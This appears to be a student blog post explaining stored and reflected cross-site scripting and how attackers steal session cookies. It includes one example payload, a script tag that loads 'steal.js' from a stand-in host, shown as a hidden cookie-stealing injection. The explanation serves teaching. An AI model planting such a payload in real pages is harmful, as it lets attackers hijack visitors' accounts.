For this blog post I will be discussing XSS attacks what this type of attack is, how attackers execute this attack, a real-world example of people exploiting this vulnerability, and how to successfully prevent an attacker from exploiting this vulnerability on your site. So, what exactly is a cross site scripting (XSS) attack? It is an attack that targets users of a web application rather than manipulating the application itself. A successful cross site scripting attack is to fool users on a web application into unknowingly surrender their private data, along with obtaining a user’s session cookies to be able to impersonate that particular user. There are two XSS attack types the first being stored XSS which is when an attack puts tainted script directly into a web application, which will get anyone who visits the site. The other type of XSS attack is reflected XSS which where tainted script is reflecting on the web application onto the user’s browser; and the tainted script is hidden in a link that will execute once the user clicks on it.
A more in depth look at XSS attacks with an example of how an attacker would exactly carry out this attack for a stored XSS attack the attacker must study the website to find a weak point to embed HTML tags in a section on the site. Once attacker does this the link that they embed will be stored on the website. An attacker could hide the malicious link in the site such as: Make millions click here <script src=http://nothingfishy.com/steal.js></script>. This will make it possible so that every time that the page loads the hidden script will execute and be able to steal anyone that visits the site’s session cookies. From learning a user’s session cookies an attacker could then gain access to that person’s account. Once the attacker has access to the victim’s account, they could access sensitive information, and impersonate the user. This would all occur from a user just going to a compromised webpage and not having to click on anything that looked suspicious. While an example of a reflected XSS attack is where an attacker would have to embed a malicious link to the website and try to hide the script. Although this method will not automatically execute when you load to the site like the stored XXS attack does. Instead a user would have to click the link to execute the attack for the user’s session cookies to be compromised to the attacker. So, the more damaging attack is the stored XSS attack because it will be able to collect everyone who visits the webpage session cookies allowing the attacker to access many different accounts. As opposed to trying to trick someone to click a suspicious looking link.